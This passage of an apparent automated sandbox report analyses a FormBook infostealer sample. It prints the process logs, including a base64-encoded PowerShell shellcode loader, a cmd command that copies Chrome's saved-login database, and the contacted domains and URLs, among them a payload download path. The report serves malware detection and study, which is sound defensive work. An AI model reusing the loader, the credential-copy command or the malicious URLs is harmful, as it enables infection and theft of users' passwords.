BsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBSAHYAZQBuACAAUABBAFAAQQBQACAAcwBhAHcAYgBlAGwAbAB5AHUAbgAgAFIAaQBjAGEAcgBkAHQANQAgAE8ASwBTAEIATwBOAE4ARQBUAEwAIABTAEMASQBFACAAYwBoAGkAbgBhAG4AdABhAHMAIABOAG8AbgBzACAATwBzAGEAbQBpAG4AZQAgAEIAYQB0AHQAYQBsAGkAYQAyACAASABvAHYAZQBkAHAANAAgAHAAcgBvAGYAZQBzAHMAaQAgAG4AYQBuAGEAawBvAGwAIABlAG4AcwBpAGwAZQByAGUAawBsACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAGkAZAByAGEAZwBzADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABiAGkAZAByAGEAZwBzADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEEAdQB4AGEAbQB5AGwAYQBzAGUALABpAG4AdAAgAEYAZQBqAGUAbQAsAHIAZQBmACAASQBuAHQAMwAyACAAYgBpAGQAcgBhAGcAcwAsAGkAbgB0ACAASABPAEMASwBFAFkASwBBAE0AUAAsAGkAbgB0ACAAYgBpAGQAcgBhAGcAcwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAFMAZQBtAGkAZwBsAHUAdAA3ACwAdQBpAG4AdAAgAEEAVABUAEUAUwBUAEUALABpAG4AdAAgAEUAdABpAGsAZQB0ADkALABpAG4AdAAgAGIAaQBkAHIAYQBnAHMAMAAsAGkAbgB0ACAAYgBlAGwAbABlAHYALABpAG4AdAAgAEIAdQBsAGQAcgByACwAaQBuAHQAIABGAE8ATABLAEUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAARgBlAGoAZQBtADAALAB1AGkAbgB0ACAARgBlAGoAZQBtADEALABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABGAGUAagBlAG0AMwAsAGkAbgB0ACAARgBlAGoAZQBtADQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgB1AHMAZQByADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKABJAG4AdABQAHQAcgAgAEYAZQBqAGUAbQA1ACwAaQBuAHQAIABGAGUAagBlAG0ANgAsAGkAbgB0ACAARgBlAGoAZQBtADcALABpAG4AdAAgAEYAZQBqAGUAbQA4ACwAaQBuAHQAIABGAGUAagBlAG0AOQApADsADQAKAH0ADQAKACIAQAANAAoAIwBCAGUAcgBpAGcAbgBpAG4AZwAgAGIAYQBsAHUAcwB0ACAARgBqAGUAcgB0ACAAUwBwAGwAaQBuAHQAcgBpADcAIABNAGUAbABhAG4AaQBzAHQAcwAgAFYASQBDAEUAVQBEAEUATgBSAEkAIABuAGUAdAB0AG8AdgByAGQAIABNAEEARwBTAFYARQBKAFIAQwBMACAATQBpAHIAawBvAHMAdQAgAEMAbwBjAGsAZgBpAGcAaAB0AGEAIABjAG8AcABwAGUAcgBlACAATwBQAEUATABTAEsAIABCAEoAUgBOAEUAVQBOACAASABhAGcAZQBkAGUAcwBtADcAIABmAGEAcgByACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBvAGIAagBlAGsAdAAiACAADQAKAFQAZQBzAHQALQBQAGEAdABoACAAIgBGAE8ATABLAEUAIgAgAA0ACgAkAGIAaQBkAHIAYQBnAHMAMwA9ADAAOwANAAoAJABiAGkAZAByAGEAZwBzADkAPQAxADAANAA4ADUANwA2ADsADQAKACQAYgBpAGQAcgBhAGcAcwA4AD0AWwBiAGkAZAByAGEAZwBzADEAXQA6ADoATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAY Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ej2xf2fu\ej2xf2fu.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5835.tmp" "c:\Users\user\AppData\Local\Temp\ej2xf2fu\CSC2BA07324D1EB47AD834E18C884AF81E4.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000022.00000000.755846261.0000000004532000.00000004.00000001.sdmp, explorer.exe, 00000022.00000003.676433392.0000000004534000.00000004.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000016.00000000.527886714.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.585187723.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.578176779.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.566378249.00000000083E7000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.554958634.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000016.00000000.534558987.00000000083E7000.00000004.00000001.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525253888.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.574481518.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.549317340.00000000008B8000.00000004.00000020.sdmp, cmstp.exe, 0000001B.00000002.889678857.0000000003060000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp, explorer.exe, 00000022.00000000.715392182.0000000005120000.00000004.00000001.sdmp, explorer.exe, 00000022.00000000.758084456.0000000005120000.00000004.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000022.00000000.753715921.0000000000B10000.00000002.00020000.sdmp Binary or memory string: vProgram Manager
Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000016.00000000.551257243.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.525709271.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000016.00000000.575081727.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000022.00000000.702018769.00000000005F7000.00000004.00000020.sdmp, explorer.exe, 00000022.00000000.753310066.00000000005F7000.00000004.00000020.sdmp Binary or memory string: ProgmanS

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\cmstp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmstp.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 0000001B.00000002.884036169.0000000000D40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.884961928.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.602508277.0000000002C90000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.606173802.000000001E9A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.580329800.0000000006624000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000000.558838756.0000000006624000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552589 Sample: MTIR22024323_0553381487_202... Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 62 www.jewelrystore1.com 2->62 76 Found malware configuration 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 Multi AV Scanner detection for submitted file 2->80 82 8 other signatures 2->82 12 wscript.exe 2 2->12         started        signatures3 process4 signatures5 92 VBScript performs obfuscated calls to suspicious functions 12->92 94 Wscript starts Powershell (via cmd or directly) 12->94 96 Very long command line found 12->96 98 Encrypted powershell cmdline option found 12->98 15 powershell.exe 25 12->15         started        process6 signatures7 102 Tries to detect Any.run 15->102 104 Hides threads from debuggers 15->104 18 ieinstal.exe 6 15->18         started        22 csc.exe 3 15->22         started        25 conhost.exe 15->25         started        27 2 other processes 15->27 process8 dnsIp9 64 www.wizumiya.co.jp 52.68.15.223, 443, 49775 AMAZON-02US United States 18->64 84 Modifies the context of a thread in another process (thread injection) 18->84 86 Tries to detect Any.run 18->86 88 Maps a DLL or memory area into another process 18->88 90 3 other signatures 18->90 29 explorer.exe 3 18->29 injected 58 C:\Users\user\AppData\Local\...\ej2xf2fu.dll, PE32 22->58 dropped 31 cvtres.exe 1 22->31         started        file10 signatures11 process12 process13 33 cmstp.exe 1 18 29->33         started        37 ieinstal.exe 29->37         started        39 autochk.exe 29->39         started        41 ieinstal.exe 29->41         started        file14 54 C:\Users\user\AppData\...\O11logrv.ini, data 33->54 dropped 56 C:\Users\user\AppData\...\O11logri.ini, data 33->56 dropped 68 Detected FormBook malware 33->68 70 Tries to steal Mail credentials (via file / registry access) 33->70 72 Tries to harvest and steal browser information (history, passwords, etc) 33->72 74 3 other signatures 33->74 43 cmd.exe 2 33->43         started        47 explorer.exe 33->47         started        50 explorer.exe 33->50         started        signatures15 process16 dnsIp17 60 C:\Users\user\AppData\Local\Temp\DB1, SQLite 43->60 dropped 100 Tries to harvest and steal browser information (history, passwords, etc) 43->100 52 conhost.exe 43->52         started        66 192.168.2.1 unknown unknown 47->66 file18 signatures19 process20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.68.15.223
 www.wizumiya.co.jp United States
16509 AMAZON-02US true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
www.jewelrystore1.com 154.208.173.143 true
www.wizumiya.co.jp 52.68.15.223 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.jewelrystore1.com/wk3t/ true
  • Avira URL Cloud: safe
 low
https://www.wizumiya.co.jp/html/user_data/original/images/bin_WUOAiR166.bin false
  • Avira URL Cloud: safe
 unknown
https://www.wizumiya.co.jp/html/user_da true
  • Avira URL Cloud: safe
 unknown